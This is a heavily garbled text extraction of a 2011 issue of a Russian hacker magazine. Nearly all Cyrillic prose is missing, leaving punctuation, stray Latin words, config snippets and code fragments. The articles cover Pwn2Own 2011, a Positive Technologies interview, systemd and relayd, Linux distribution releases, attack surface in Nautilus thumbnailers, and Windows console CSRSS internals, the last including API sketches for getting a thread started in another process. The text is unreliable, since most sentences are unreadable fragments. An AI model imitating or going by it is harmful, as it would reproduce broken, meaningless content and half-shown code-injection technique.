, $100 000 ( , ,
$100 000, $125 000),
$10 000 20 000. TippingPoint
. ,
,
,
.
TippingPoint Zero Day Initiative
(zerodayinitiative.com), Snosoft program (snosoft.blogspot.
com) iDefense Vulnerability Contributor
Program. Pwn2Own ZDI,
.
, TippingPoint ,
. ,
.
X 05 /148/ 2011
CanSecWest 2008
. , TippingPoint 2011
Pwn2Own , .
Pwn2Own 2011
X 05 /148/ 2011
, Pwn2Own
, .
, . , Pwn2Own
GeoHot ,
,
,
Pwn2Own. ,
,
- .
,
TippingPoint. 2011 .
, ? ,
:
,
. , ,
Pwn2Own ( ,
, tippingpoint.com).
. 30
, , . ,
, .
.
, ( ) -, Microsoft Internet Explorer, Apple
Safari, Mozilla Firefox Google Chrome. , Chrome
, 2009 2010 .
, , : Opera?.
083
Pwn2Own:
. Opera ZDI
. ,
.
64- OS X Windows 7,
,
.
IE, Safari Firefox
$15 000,
Chrome Google
.
, Google, $20
000 CR-48.
,
ZDI $10 000
, Google,
Google Chrome $10 000.
, ,
/, / .
2011 : Sony Vaio (Windows 7),
Alienware m11x (Windows 7), Apple MacBook
Air 13 (Mac OS X Snow Leopard) Google
CR-48 (ChromeOS), , .
.
:
Dell Venue Pro (Windows 7), iPhone 4 (iOS),
Blackberry Torch 9800 (Blackberry 6 OS)
Nexus S (Android).
$15 000.
Pwn2Own , , .
,
.
,
, TippingPoint
:
,
.
.
, ,
Pwn2Own, ,
Safari
.
, , ,
-
Vupen Safari
. Apple ,
, Safari 5.0.4 iOS 4.3.
,
Pwn2Own
,
, . Vupen,
, , , -
,
, .
-
085
X 05 /148/ 2011
Pwn2Own 2011,
,
, Vupen
Safari
-.
,
, ,
.
,
,
,
.
Internet Explorer 8,
64- Windows 7 SP1.
, Vupen,
Harmony Security
. , Vupen
, IE
Protected mode,
.
, ,
,
.
.
. , 32- IE.
Chrome . ,
2009 2010
, . ,
,
,
- . ,
.
Google
. , ,
,
Chrome html Java.
. ,
2010 iPhone 3GS
-
.
X 05 /148/ 2011
CanSecWest 2007
iPhone 4
BlackBerry Torch.
,
Independent Security
Evaluators. , Apple
,
.
iOS 4.2.1, iOS 4.3
ASLR. ,
:
ASLR, ,
$15 000 iPhone 4 .
, 2010
iPhone. - ,
BlackBerry 6.0.0.246.
BlackBerry
Torch 9800 - -
. RIM
ASLR, DEP ,
.
, , .
,
PlayStation3
Sony.
Dell Venue Windows Phone 7, -
.
, , , :
,
.
,
, Pwn2Own
-
. ,
, . z
085
c0n Difesa (condifesa@gmail.com, defec.ru)
Positive Technologies
1998 . .
,
, .
XSpider,
Positive Technologies.
. ,
, ,
IT-.
, .
; ,
;
,
, . , , .
,
1998
, .
XSpider Positive Technologies,
.
,
Positive Technologies:
086
Positive Technologies
( )
[]: Positive Technologies
?
MaxPatrol,
- ?
( Positive Technoloiges)
[]: , Positive Technologies
. ,
. :
PT Cleaning Services Inc.
. MaxPatrol, ,
. PT
, Positive Research,
.
,
, .
.
X 05 /148/ 2011
MaxPatrol , PT
DVD
dvd
100% Virus Free
Podcast,
,
HTTP://WWW
links
-
PT
PT
,
- ,
. ,
. .
?
, ?
[]:
( Positive Technologies)
[]: , -
,
.
X 05 /148/ 2011
-
Positive Technologies:
ptsecurity.ru;
: sgordey.blogspot.
com;
:
devteev.blogspot.com;
Positive Hack
Days: phdays.ru.
087
,
.
, ,
MaxPatrol.
,
,
.
[]: C 2008
MaxPatrol. ,
, .
-
. ?
[]: MaxPatrol, XSpider,
Enterprise. -
-
.
,
. , MaxPatrol ,
.
-
, XSpider
XSpider.
[]: MaxPatrol
.
(PCI DSS)?
[]: .
[]:
?
[]: ,
.
[]: -
,
,
?
[]: , -
.
Enterprise Security.
, -
PT
Google
.
[]:
,
?
[]: . (hh.ru/
employer/26624). , . ,
, ,
.
[]: PT -
, ,
?
[]: , .
XSpider MaxPatrol
088
X 05 /148/ 2011
, ...
[]: , , on-site ?
[]: ,
. , Wi-Fi . ,
.
[]: , , ?
[]: . , , .
[]: Positive Technologies
?
[]: , .
.
[]: ?
[]: Positive Technologies
,
:
, .
, ,
GRC (Governance, Risk, Compliance).
Positive Technologies Security Operational Center,
.
,
, - , ERP, ()
(). , (VOIP, PBX, 3G), /SCADA.
.
,
. , ,
, .
[]:
?
[]:
SCADA-. , .
[]: , -
-. , , ,
,
?
[]: , . , , , ERP SCADA.
,
.
[]: PT PCI DSS?
[]: , PCI DSS
, . 2008 Positive Technologies
PCI DSS QSA Associate, 2006
Web PCI DSS. PCI DSS ASV. MaxPatrol
QSA ASV .
[]: .
, ?
?
[]: ,
.
:) .
[]: 2010 Google . , , ,
. ( ,
) ?
[]: , , . ,
.
Google,
, SQL Injection . fun, . Positive Technologies .
Google, .
, MaxPatrol .
X 05 /148/ 2011
, 19 2011 Positive
Hack Days, Positive Technologies.
: -,
, .
, ,
,
-, .
,
.
. z
089
UNIXOID
(zobnin@gmail.com)
yd
rela
d
f sc
s ys t e m d
cyd
n
e
t
ula
Linux- :
/sbin/init, , ,
. ,
,
: syslogd, cron, cups , . init
: getty xdm (kdm, gdm). ,
? ,
Windows Mac OS X . ,
090
, .
-,
, ,
,
.
Linux Ubuntu, . ,
(Gentoo Arch, !). -
,
.
X 05 /148/ 2011
HTTP://WWW
links
systemd
: freedesktop.
org/wiki/Software/
systemd;
freedesktop.org
systemd: cgit.
freedesktop.org/
systemd;
ulatencyd:
github.com/poelzi/
ulatencyd;
fscd:
people.freebsd.
org/~trhodes/fsc.
ulatencyd
pf + relayd:
# vi /etc/pf.conf
# WWW-
relayd
rdr on $int_if inet proto tcp from $lan to any \
port www tag INTWEB -> lo0 port 8080
#
pass in log on $int_if inet proto tcp from $lan\
to lo0 port 8080 flags S/SA synproxy state \
tagged INTWEB
# vi /etc/relayd.conf
http protocol "httpfilter" {
# TCP-
tcp { nodelay, sack, socket buffer 65536,
backlog 1000 }
#
label "BAD user agent"
request header filter "Mozilla/4.0*" from
"User-Agent"
#
label "BAD Host request"
request header filter "*youtube.com*" from
"Host"
request header filter "*facebook.com*" from
"Host"
#
request header change "Accept-Language"
to "ru-ru,ru;q=0.9"
...
, Red Hat
PulseAudio, .
systemd,
/sbin/init, , , ,
.
Systemd ,
. 99%
X 05 /148/ 2011
INFO
fscd
,
/sbin/
init .
,
(
, , ,
,
), .
,
,
, . , cron syslog,
; syslog ,
. -
,
. Systemd
, , , , .
. Systemd
,
(
, swap,
). ,
90% ,
systemd
, .
, systemd
.
, ,
: cron
syslog, /dev/log,
info
systemd
,
gnomesession kdeinit.
, systemd
,
fscd
.
.
systemd
, .
relayd hostated
( host state,
),
.
091
UNIXOID
Systemd
Fedora
. : freedesktop.
org/wiki/Software/systemd.
Systemd Ubuntu , :
d
f sc
/boot/grub/grub.cfg,
init=/sbin/systemd.
,
:
relayd
,
. ,
, A
B, C D, , A , . Systemd ,
,
,
. , .
, , cron syslog,
cron /dev/log
( , ),
, , , ,
, cron , .
cron
( ). (
) syslog, , , /dev/log,
- ( ),
. .
,
,
. , , CUPS ,
. ,
. Systemd ,
, ,
(
-).
,
Mac OS X , systemd
- .
, systemd Linux
:
cgroups
( , ,
umask, OOM killer, nice,
-,
).
, systemd
.
092
cyyd
n
e
t nc d
a
l
ulate
u
, ,
status, start, stop enable.
ulatencyd:
, ,
? ?
? ?
, , ,
,
,
.
. ,
,
,
, , .
,
. ( BeOS),
( MS), , . Linux
Linux .
, Linux, ,
, .
, ,
.
.
CFS
(Completely Fair Scheduler), 2.6.23.
, Linux (
).
Linux
200- 2.6.38, bash. Linux
,
bash- .
: Linux ,
.
, Linux (
) ulatencyd,
,
.
X 05 /148/ 2011
ulatencyd ,
, ulatencyd cgroups
, .
, ,
- .
,
( , ), .
,
,
( ) ,
.
,
.
, (
),
, .
ulatencyd,
https://github.com/poelzi/ulatencyd
cmake make:
$ cmake
$ make
$ sudo make install
:
$ sudo /usr/local/sbin/ulatencyd -v 2
X 05 /148/ 2011
, :
$ ps xaf -eo pid,session,args,cgroup
.
,
, .
relayd:
,
-? ?
, . ,
? ? .
, ,
DNS-. ? -, DNS-
( DNS-).
BIND ( ). ,
DNS-. ,
( ). -,
DNS- .
, ,
( ?). , -
093
UNIXOID
systemd ( After),
syslog
.
SMTP?
? ,
- ,
.
relayd, OpenBSD 4.3,
, ,
.
3, 4 7, 7 ()
( ).
relayd ,
- SSL-
web-
web-.
,
50 .
, , .
, ,
:
# vi /etc/relayd.conf
###
#
relayd_addr="127.0.0.1"
relayd_port="8053"
# DNS-,
#
table <dns_servers> { 192.168.1.1, 192.168.1.2,
192.168.1.3 }
094
###
#
# (10 )
interval 10
# TCP
# ( 200 )
timeout 200
# 5
#
prefork 5
#
log updates
### DNS-
#
dns protocol "dnsfilter" {
tcp { nodelay, sack, socket buffer 1024, backlog 1000 }
}
###
relay dnsproxy {
#
listen on $relayd_addr port $relayd_port
#
protocol "dnsfilter"
# DNS-
# DNS-,
forward to <dns_servers> port 53 \
X 05 /148/ 2011
systemctl
mode loadbalance check tcp
}
.
.
relayd_flags= /etc/rc.conf.local.
FreeBSD fscd:
. fscd ,
. , ,
UNIX. FreeBSD .
X 05 /148/ 2011
( , ).
, .
, ?
. ? ,
(
). , , Solaris , , , .
FreeBSD . , FreeBSD, .
, fscd ,
, man- ,
. , fscd , , sshd, :
# fscadm enable sshd /var/run/sshd.pid
, fscd . :
/etc/rc.d ( /usr/local/etc/rc.d) /etc/
rc.conf, ( ).
fscd FreeBSD 9.0, (people.freebsd.
org/~trhodes/fsc) .
UNIX - ,
- .
UNIX, ,
. ,
UNIX, grep
syslog. z
095
UNIXOID
Adept (adeptg@gmail.com)
,
, .
. , OpenSource
-.
, Debian 6 ( Squeeze).
. , Debian
: x86 x86-64,
ARM (armel)
powerpc ia64 (Intel Itanium), sparc (Oracle
SPARC), mips s390 (IBM S/390).
alpha hppa (HP PA-RISC).
096
Kit
ConsoleKit ,
.
.
ConsoleKit ,
. ConsoleKit
.
Seat
/
( , Seat
++).
login manager,
,
Seat. , ,
$XDG_SESSION_COOKIE. ConsoleKit
.
:
$ ck-list-sessions
PolicyKit
,
.
,
PolicyKit.
,
,
root. PolicyKit sudo (,
, ) ,
,
. ,
, :
$ pkaction
# cat debian-live-6.0.0-i386-standard.iso \
> /dev/sdb
live-build,
LiveCD/LiveUSB.
(
Lenny) :
1.
X 05 /148/ 2011
Fedora Gnome3
ext4 (
ext3) ZFS ( Debian GNU/
kFreeBSD), reiserfs (
partman-reiserfs ).
2.
.
3.
SSH-.
:)
4.
firmware.
,
.
5. ( GRUB2)
Windows.
:
1. .
insserv,
( ).
2. KMS (Kernel Mode Setting
) Intel,
AMD, Nvidia. KMS
,
suspend/resume.
3. <Ctrl+Alt+Backspace>, ,
.
4. IPv6,
. IPv4 .
HTTP://WWW
links
Debian LiveCD:
live.debian.net;
ConsoleKit:
goo.gl/duKxN;
PolicyKit:
hal.freedesktop.org/
docs/polkit.
openSUSE 11.4. :
/
libzypp,
, ;
systemd ( );
OpenOffice LibreOffice;
WebYaST web- ;
HAL (Hardware Abstraction Layer) ;
Linux- 2.6.37;
DE: Gnome 2.32.2 ( Gnome3,
), KDE 4.6, Xfce 4.8;
: XOrg 7.6, Mesa 7.9, Python 2.7, Qt 4.7;
: Firefox 4, VirtualBox 4.
097
UNIXOID
Unity Launcher
Mandriva-2011.
.
:
RPM5 ( RedHat);
systemd;
,
;
;
, ,
, ;
Linux- 2.6.37;
DE: KDE 4.6 DE , Gnome 2.32, Xfce 4.8;
: XOrg 7.5, GCC 4.5;
: Firefox 4, openoffice 3.3.
5. OSS . , ,
.
6.
/etc/default/keyboard.
7. DE: KDE SC 4.4.5, GNOME 2.30 ( 2.32), Xfce 4.6, LXDE 0.5.0.
8. : OpenOffice.org 3.2.1,
Iceweasel (Firefox) 3.5.16.
:
1. Linux 2.6.32 Xen 4.0.1 (dom0 domU).
2. : GCC 4.4.5, X.Org 7.5.
3. : OpenSSH 5.5p1, Apache 2.2.16, MySQL
5.1.49, PostgreSQL 8.4.6, Samba 3.5.6.
4. : Python 2.6.6 (3.1.3 ),
Perl 5.10.1, PHP 5.3.3, Ruby 1.9.1.
5. glibc eglibc (Embedded GLIBC, ),
, glibc.
6. LDAP ( libnss-ldapd, libpam-ldapd nslcd).
7.
DebSrc 3.0,
(
).
8. dpkg. XZ
( LZMA2). dpkg perl.
9. ConsoleKit PolicyKit (.
Kit ).
10. DNSSEC (
098
, KDE
DNS-) DNS-
BIND9. OpenDNSSEC
DNSSEC- .
Debian - :
1. Debian Backports (
)
backports.debian.org.
2. Debian Squeeze debian.org, 13 (!) .
: packages.debian.org, wiki.
debian.org . , , ,
, : replay.waybackmachine.org/20100830160456/http://
www.debian.org.
Debian . ,
.
non-free.
Debian, Ubuntu
- .
11.04 ( Natty Narwhal) 28
. 10.04 10.10
,
.
Unity (
). Unity : ,
. , .
Unity
GlobalMenu,
. ,
, , .
,
, .
Unity Launcher. ,
, : Win ( Super).
Unity Dash,
Ubuntu . , Dash / , /
, , .
, Unity, . ,
, /, Compiz. Compiz, Unity
X 05 /148/ 2011
Software Center
gentoo Calculate Linux 11.0.
, .
:
Calculate Scratch Server;
Calculate Linux Desktop
Calculate Directory Server rolling-release;
;
Calculate Linux Desktop;
Portage 2.2;
Canon;
KMS Intel.
Clutter (
OpenGL ) Zeitgeist (
/
).
Unity
, - .
15,6" 2.
. ,
. ,
Unity Fedora
OpenSUSE .
Compiz, D-Bus , Unity.
, Unity .
- Unity , gdm Ubuntu
Classic Gnome ( Gnome Shell).
Unity , , :
1. armel
( OMAP3 OMAP4). x86
. , ARM . Canonical :)
2. Banshee.
, mono, mono . .
, Banshee , GNOME Foundation. Canonical ,
Canonical :).
, Banshee Ubuntu
, 25% GNOME Foundation.
3. LibreOffice 3.3 OpenOffice.
X 05 /148/ 2011
Debian
4. Software Center .
5. Ubuntu One Shotwell.
6. Shotwell 0.8 ( , YouTube,
Flickr, Facebook, PicasaWeb .).
7. Linux 2.6.38.
8. : GCC 4.5, X.Org 7.6.
9. DE: KDE 4.6, Gnome 3, Xfce 4.8, LXDE 0.5.0.
10. , , ,
Wayland.
RPM-based
Red Hat Enterprise Linux 6,
2020 .
:
1. Linux 2.6.32 ,
.
RHEL6,
. ABI- .
CFS (Complete Fair Scheduler). , ( / ). ,
2-5 .
2. SySV init upstart.
3. KVM,
.
Xen Dom0 , Xen DomU (
). SPICE (Simple
Protocol for Independent Computing Environments),
.
SPICE VNC (Virtual Network Computing) RDP
(Microsoft Remote Desktop Protocol) - ,
. , ,
;
4.
PCI Express.
5. ext4.
XFS, NFSv4
Btrfs.
6. System Security Services Daemon (SSSD) - . LDAP, Kerberos .
: (offline mode).
7. , , ,
.
099
UNIXOID
Ubuntu One
,
.
8. : GCC 4.4, X.Org 7.5.
9. DE: KDE 4.3.4, Gnome 2.28.6.
10. : Apache 2.2.15, MySQL 5.1.47,
PostgreSQL 8.4.4, Samba 3.5.4.
11. : PHP 5.3.2, Python 2.6.5.
RHEL .
CentOS. CentOS 6
, -. ,
. OSS-
Scientific Linux 6 (scientificlinux.org).
. CERN ( ,
) .
RHEL 6:
IceWM;
OpenAFS ;
revisor, livecd-tools liveusb-creator LiveCD/LiveUSB;
yum-autoupdate .
,
Scientific Linux, . Oracle , RHEL 6, Oracle Linux 6. RHEL . Unbreakable
Enterprise Kernel ( 64- ),
, , Oracle, :).
100
,
. ( 8.1)
FreeBSD 8.2 7.4. 7.4 -
X 05 /148/ 2011
eth0, em1
: , ( : Atheros AR8151/
AR8152, Broadcom BCM5718, SiS190/191 ).
.
FreeBSD 8.2 :
1. ZFS 15 , OpenSolaris , ZFS.
2. geli
,
. AES-XTS,
geli .
3. netgraph-, .
4. , USB 3.0 (xhci).
5.
CPU Intel.
6. (Atheros AR8151/AR8152
PCIe Gigabit/Fast Ethernet, Intel 10Gb Ethernet 82599 Broadcom
BCM5718) (Intel Wireless WiFi Link 6000, Broadcom
BCM430* BCM431*) .
7. DTrace , .
8. tar LZMA.
9. FreeBSD x86-64
Xen HVM.
X 05 /148/ 2011
changelog :
1. ,
- , (,
upstart systemd).
2. , HAL.
3. D-Bus (.
][ 2010 ,
xakep.ru/post/54722/default.asp).
4.
LibreOffice. , Debian
.
5. ext4.
- , , btrfs.
6. , Wayland XOrg. z
101
UNIXOID
iv (ivinside.blogspot.com)
WINDOWS
Linux
.
. ,
:
.
Autorun.inf ,
.autorun!
, , Windows
usb-
.
autorun.inf,
,
. , Windows 7, . .
102
( Stuxnet) ,
.
, .
freedesktop.org,
, GNOME KDE, : .autorun, autorun
autorun.sh. , .
.autorun, , .
X 05 /148/ 2011
40 960 evince-thumbnailer
libc
Ubuntu
1. AppArmor Linux,
.
,
. Ubuntu
AppArmor.
apparmor-profiles.
/usr/share/doc/apparmor-profiles/extras,
/etc/apparmor.d.
2. ASLR (Address Space Layout Randomization)
.
ELF
, ,
. /proc/sys/kernel/
randomize_va_space (1
2) (0) ASLR. 2005 (
2.6.12) Linux
ASLR. (PaX, ExecShield
)
ASLR. , Hardened, Ubuntu
.
3. PIE (Position Independent Executables)
-fPIE pie.
ASLR
.
32- ,
( 10%).
4. NX (No eXecute Bit)
, ,
.
:
,
( Intel Pentium 4 6xx AMD Athlon 64);
PAE x86-64 (
).
, autorun.inf Windows,
.
,
,
. , (,
X 05 /148/ 2011
Evince
pdf) .
.autoopen autoopen
, , . , Nautilus
(?) .
.
?
.
,
, . (
) :
USB, eSATA, FireWire, PCMCIA;
(ext3, ext4
);
(ntfs-3g);
(
).
.
, 2009 VoIP
Auerswald (CVE-2009-4067).
USB- .
.
USB-
, QEMU
USB-. 2009
ext4,
ext4_decode_error(),
NULL-
.
, .
,
.
( FUSE)
, .
HTTP://WWW
links
,
-
:
goo.gl/2wIIA;
,
: cve.mitre.org/
cve/cve.html;
: youtube.
com/watch?v=
ovfYBa1EHm4;
, Ubuntu:
wiki.ubuntu.com/
Security/Features.
DVD
dvd
DVD
ShmooCon 2011,
, ,
.
103
UNIXOID
Nautilus ,
? :
1. . , .
2. (lint, clang static analyzer ).
3. . ( )
. , , , ,
,
. , , ( smart fuzzing).
,
.
! Nautilus
, ,
. GdkPixBuf,
,
libpng, libtiff, libjpeg. . 2011
libpng < 1.5.0 (CVE-2011-0408),
png_do_expand_palette() png_do_rgb_to_gray(). pngrtran.c. PNG-, MNG- JNG-
,
ShmooCon. , PoC-
,
1.5.1. 2010 LibTIFF 3.x, TIFF-
SubjectDistance.
3.9.4. FreeType < 2.4.3,
TrueType GX. ft_var_readpackedpoints().
, Linux .
:
evince-thumbnailer pdf;
totem-video-thumbnailer - ;
gnome-thumbnail-font .
, evincethumbnailer :
Evince PDF-.
, PostScript, TIFF, DVI, DjVu.
GNOME.
Common Vulnerabilities and Exposures, ,
Evince ,
2010 . (CVE2010-2640) ,
, .
Ubuntu
10.10 (
kill.sh
killall gnome-screensaver).
DVI-.
,
(/media/NNN). ,
, Nautilus
.
Nautilus
104
'-s' , PDF-,
. Nautilus
X 05 /148/ 2011
.
:
$ gconftool -R /desktop/gnome/thumbnailers
, :
. ,
AppArmor Ubuntu 10.10, totem-videothumbnailer gnome-thumbnail-font. ,
Ubuntu . ,
, ,
, . Ubuntu
,
. , .
Ubuntu :
AppArmor, ASLR, PIE, NX-.
,
(ret2lib) - (ROP).
ShmooCon 2011 ASLR/PIE
32- Linux. ,
libc ( ), , 3 000 , .
,
( ,
). , , pdf-,
evince-thumbnailer. ,
Nautilus evincethumbnailer.
AppArmor ,
, /etc/apparmor.d.
, Ubuntu 10.10 evince-thumbnailer
~/.config/autostart ,
(
) . AppArmor ,
X 05 /148/ 2011
Nautilus
:
X11 ( );
, ,
.
,
, :
1. . Linux
, Windows, .
.
2. (
) Nautilus .
Nautilus Edit -> Preferences -> Media
Browse media when inserted.
3. .
Nautilus, . Nautilus
Edit Preferences Preview.
4. AppArmor ,
.
Skype, , .
5. PaX,
,
. PaX ASLR,
.
6. 64- , ASLR ,
. , 64
,
x86-64 .
7. Ubuntu (
), ,
, , .
, Linux , ,
Ubuntu. ,
:
- Linux
Windows. z
105
CODING
(stannic.man@gmail.com)
? , ,
.
. ,
.
106
, .
,
.
Windows
, , ( ), , LPC/RPC, COM, -.
- ,
( ru.wikipedia.org/wiki/_). , ,
X 05 /148/ 2011
,
.
CSRSS.
? , . ,
API- AllocConsole. (
) AttachConsole
.
: - ,
csrss.exe. , ,
, ,
() . SetConsoleCursorInfo, SetConsoleCursorPosition,
SetConsoleTitle ( Get-).
, csrss.exe
. ? ( )
65535 ,
. ,
,
,
CSRSS
. ,
.
CTRL+C
?
,
CTRL+C,
?
CTRL+ . CTRL_C_EVENT,
CTRL+C.
CTRL_BREAK_EVENT, . CTRL_CLOSE_EVENT, , ,
. CTRL_LOGOFF_EVENT
, .
, CTRL_SHUTDOWN_EVENT, ,
.
API GenerateConsoleCtrlEvent.
,
CTRL-, ,
- . kernel32.
dll!SetConsoleCtrlHandler,
CTRL-.
.
.
?
, ,
,
? ,
, ,
, ,
X 05 /148/ 2011
AllocConsole. winsrv!SrvAllocConsole. ,
,
kernel32!CtrlRoutine
kernel32!PropRoutine (
CsrClientCallServer
0x20224).
- CTRL- CSRSS
(!)
: winsrv!ProcessCtrlEvents
winsrv!CreateCtrlThread winsrv!InternalCreateCallba
ckThread kernel32!CreateRemoteThread.
CtrlRoutine.
, CSRSS ,
,
.
CreateThread(Ex).
,
: ,
, Ctrl+C Ctrl+Break,
. API-
.
CSRSS,
CreateThread(Ex).
:
HTTP://WWW
links
MSDN:
http://goo.gl/bTwhz.
, MSDN!
INFO
info
?
IDA
Pro WinDbg
!
AllocConsole();
SetConsoleCtrlHandler( threadHandler1,TRUE );
SetConsoleCtrlHandler( threadHandler2,TRUE );
GenerateConsoleCtrlEvent( CTRL_C_EVENT,
GetCurrentProcessId() );
//
threadHandler2(CTRL_C_EVENT)
//
107
CODING
threadHandler1(CTRL_C_EVENT)
SetConsoleCtrlHandler( threadHandler1, FALSE );
SetConsoleCtrlHandler( threadHandler3, TRUE );
GenerateConsoleCtrlEvent(CTRL_BREAK_EVENT,
GetCurrentProcessId());
//
// threadHandler3(CTRL_BREAK_EVENT)
//
// threadHandler2(CTRL_BREAK_EVENT)
FreeConsole();
, ? .
:).
, API- AttachConsole
. ,
,
.
,
.
API-
AttachConsole CreateRemoteThread!
, :
;
;
AllocConsole();
AttachConsole();
SetConsoleCtrlHandler( threadHandler, TRUE );
GenerateConsoleCtrlEvent(CTRL_BREAK_EVENT,
GetCurrentProcessId());
threadHandler.
:
CTRL_C_EVENT , CTRL_BREAK_EVENT. ,
GenerateConsoleCtrlEvent
,
.
,
winsrv!SrvAllocConsole
CtrlRoutine PropRoutine.
CtrlRoutine ,
PropRoutine? PropRoutine
. , ,
. ,
,
.
, , (
winsrv!ConsoleWindowProc)
:
uMsg = WM_SYSCOMMAND
wParam = 0xFFF7
lParam = undefined
?
: NtCreateSection,
108
NtMapViewOfSection,
.
NtUnmapViewOfSection, NtDuplicateObject,
(
!)
CreateRemoteThread
PropRoutine .
, PropertiesDlgShow , winsrv!ConsoleWindowProc
.
,
- ,
PropertiesDlgShow.
? , :
- ,
, DLL ,
LoadLibraryW, (!) , ,
(
! . ) .
console.dll ,
.
, kernel32!PropRoutine,
API- CreateThread(Ex).
AllocConsole/AttachConsole , ,
AllocConsole().
, ,
:
SendMessage (hConsole, WM_SYSCOMMAND, 0xFFF7, 0)
hConsole HWND,
GetConsoleHandle().
?
kernel32!CtrlRoutine ,
, kernel32!PropRoutine
, . , ,
,
.
console.dll, , .
Windows XP console.dll
, ,
. Windows Vista
. ,
Windows , - .
console.dll \system32\, . .
! , ,
.
? , ,
,
! ... ][ ! ,
! z
X 05 /148/ 2011
CODING
herfleisch (perechnev.com)
iOS, Android, Bada, Symbian WM
AirPlaySDK
, , .
- , ,
. , ,
.
?
110
DVD
dvd
HTTP://WWW
links
AirPlaySDK
,
:
airplaysdk.com.
HelloWorld.mkb
options {
s3e-data-dir="data"
}
files {
(source)
HelloWorld.cpp
HelloWorld.h
HelloWorldMain.cpp
}
subprojects {
iw2d
}
s3e-data-dir options
,
. ,
- . data
HelloWorld. files
. source,
. :
HelloWorld.cpp, HelloWorld.h HelloWorldMain.cpp.
subprojects , .
Hello World!
, , .
HelloWorld.mkb
AirPlaySDK. ? , Visual Studio.
HelloWorldMain.cpp ,
HelloWorldMain.cpp, , .
HelloWorldMain.cpp
#include "s3e.h"
#include "HelloWorld.h"
X 05 /148/ 2011
int main() {
GameInit();
while (true)
{
s3eDeviceYield(0);
s3eKeyboardUpdate();
bool result = GameUpdate();
if ((result == false) ||
(s3eKeyboardGetState(s3eKeyEsc) &
S3E_KEY_STATE_DOWN) ||
s3eKeyboardGetState(s3eKeyLSK) &
S3E_KEY_STATE_DOWN) ||
(s3eDeviceCheckQuitRequest()))
break;
GameRender();
}
GameShutdown();
}
#include s3e.h
AirPlaySDK,
. GameInit() .
,
,
.
s3eDeviceYield(..)
.
,
, . s3eKeyboardUpdate()
,
-
. GetUpdate()
.
.
,
Visual
Studio :
dreamspark.com.
INFO
info
AirPlaySDK
,
GPS, , , ,
.
WARNING
warning
,
.
,
,
][ :).
111
CODING
HelloWorld-
,
. true, , false, , , . ,
,
,
( ).
. GameRender(), ,
. , , GameShutdown() (
) ,
, .
, . , HelloWorldMain.cpp . ,
AirPlaySDK.
, .
HelloWorld.cpp HelloWorld.cpp:
HelloWorld.cpp
#include "Iw2D.h"
void GameInit() {
Iw2DInit();
}
bool GameUpdate() {
return true;
}
void GameRender() {
Iw2DSetColour(0xFF000000);
Iw2DFillRect(
CIwSVec2(0, 0),
CIwSVec2(Iw2DGetSurfaceWidth(),
Iw2DGetSurfaceHeight())
);
Iw2DSetColour(0xFF00FF00);
Iw2DFillArc(
CIwSVec2(Iw2DGetSurfaceWidth()/2,
Iw2DGetSurfaceHeight()/2),
CIwSVec2(30, 30),
0, 0x800 * 2
);
Iw2DSurfaceShow();
}
void GameShutdown() {
Iw2DTerminate();
}
112
AirPlaySDK
, HelloWorld.cpp ,
. .
.
HelloWorld.h,
main(). :
HelloWorld.h
#ifndef HELLOWORLD_H
#define HELLOWORLD_H
void
bool
void
void
GameInit();
GameUpdate();
GameRender();
GameShutdown();
#endif
. ,
, F5 Visual
Studio. , AirPlaySDK.
CODING
deeonis (deeonis@gmail.com)
memory leaks
,
TLS
, . -.
. ,
C++ MSVC.
Windows,
Microsoft.
,
, . , .
exception delete.
, ,
, .
:
.
( ), - ,
Debug CRT.
Debug CRT
Debug CRT
Debug Heap Alloc Map.
:
Debug CRT
#ifdef _DEBUG
#include <crtdbg.h>
#define _CRTDBG_MAP_ALLOC
#endif
new
malloc()
_CrtMemBlockHeader.
, ,
.
, .
_CrtMemBlockHeader
typedef struct _CrtMemBlockHeader
{
114
,
_CrtDumpMemoryLeaks(). ,
. , ,
,
. :
_CrtDumpMemoryLeaks()
Detected memory leaks!
Dumping objects ->
{163} normal block at 0x00128788, 4 bytes long.
Data: < > 00 00 00 00
{162} normal block at 0x00128748, 4 bytes long.
Data: < > 00 00 00 00
Object dump complete.
, , .
, , -
. -
_CrtDumpMemoryLeaks(). :
_CrtDumpMemoryLeaks()
int _tmain(int argc, _TCHAR* argv[])
{
_CrtMemState _ms;
_CrtMemCheckpoint(&_ms);
// some logic goes here...
_CrtMemDumpAllObjectsSince(&_ms);
return 0;
}
X 05 /148/ 2011
_CrtMemCheckpoint(), , _CrtMemDumpAllObjectsSince(), ,
, .
, Debug CRT,
. ,
, .
115
CODING
Valgrind
.
Visual Leak Detector . ,
. ReportTo.
debugger, file both.
, .
,
ReportFile.
ReportEncoding: unicode ASCII.
(SelfTest). , . ,
output - :
ERROR: Visual Leak Detector: Detected a memory leak
internal to Visual Leak Detector.
VLD ,
, ,
. ,
, .
Visual Leak Detector ,
.
Valgrind
, , Windows
MS Visual Studio. . Valgrind .
Linux Mac OS X
, (
116
). , Valgrind
, JIT-.
, . Valgrind.
, , .
Valgrind .
( 4-5 ) . .
, Valgrind . Memcheck.
C . Memcheck , /
, .
, Addrcheck , Memcheck.
Helgrind DRD
. , Valgrind ,
.
.
. ,
memory leaks. z
X 05 /148/ 2011
1.
, ,
shop.
glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! , .
.
,
500 .
12 2200 .
6 1260 .
,
!
+ + 2 DVD:
162
( 35% , )
12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).
SYN/ACK
grinder (grinder@tux.in.ua)
SaaS
, IT- .
( ) -,
. , , , , .
SaaS?
. M- , . ,
. , , . ,
(, , )
,
,
. , , , , .
, CRM, ,
. , IT-,
,
. , ,
. . ,
CRM-,
. .
,
, ,
. , ,
. VPN
,
, .
- ,
- . , , ,
.
(SaaS, Software
as a Service) .
,
.
, , ,
.
( , ).
,
, .
, SaaS,
118
.
, SaaS,
.
, .
, ,
. ,
,
. ,
.
, , .
. (pdd.yandex.ru). ( , .) MX-
. . ,
. POP3/IMAP, -
.
., .
. 1000 ,
( - ),
. , .
, ,
.
, . Google Apps (google.com/apps/
intl/ru/business) GMail
,
, , , Google.
2 .
, GMail. .
(50$ ) 25 ,
, ,
Gmail, API-, -. ,
Postini, ,
TLS, ,
, . . ,
X 05 /148/ 2011
Google Apps. ,
API, Google Apps Marketplace (google.
com/enterprise/marketplace).
Google Apps.
,
, ,
, , VoIP
. API , ,
. ,
Apps Marketplace .
.
NextMail (nextcorp.ru), is-mail.biz
.
,
, .
( )
.
.
Talent management HCM (Human Capital Management)
.
. SaaS
Taleo (taleo.com)
